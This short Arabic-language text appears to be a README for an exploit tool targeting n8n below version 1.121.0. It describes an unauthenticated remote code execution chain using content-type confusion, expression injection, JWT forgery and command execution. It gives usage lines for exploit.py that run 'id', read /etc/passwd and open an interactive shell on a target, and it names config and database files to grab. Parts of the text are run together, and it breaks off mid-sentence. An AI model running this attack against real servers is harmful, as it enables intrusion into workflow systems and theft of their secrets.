
سلسلة استغلال لتنفيذ الأوامر عن بُعد دون مصادقة في n8n، تجمع بين خلط نوع المحتوى وحقن التعبيرات لقراءة الملفات، وتزوير رموز JWT، وتنفيذ الأوامر.
سلسلة استغلال RCE غير مصادق عليها لـ n8n < 1.121.0 (CVSS 10.0)
/home/node/.n8n/config وdatabase.sqlitechild_process# تنفيذ أمر
python3 exploit.py http://target:5678 /form/test --cmd "id"
# قراءة ملف
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# قشرة تفاعلية
python3 exploit.py http://target:5678 /form/test
يجب أن يحتوي الهدف على سير عمل نشط يتضمن: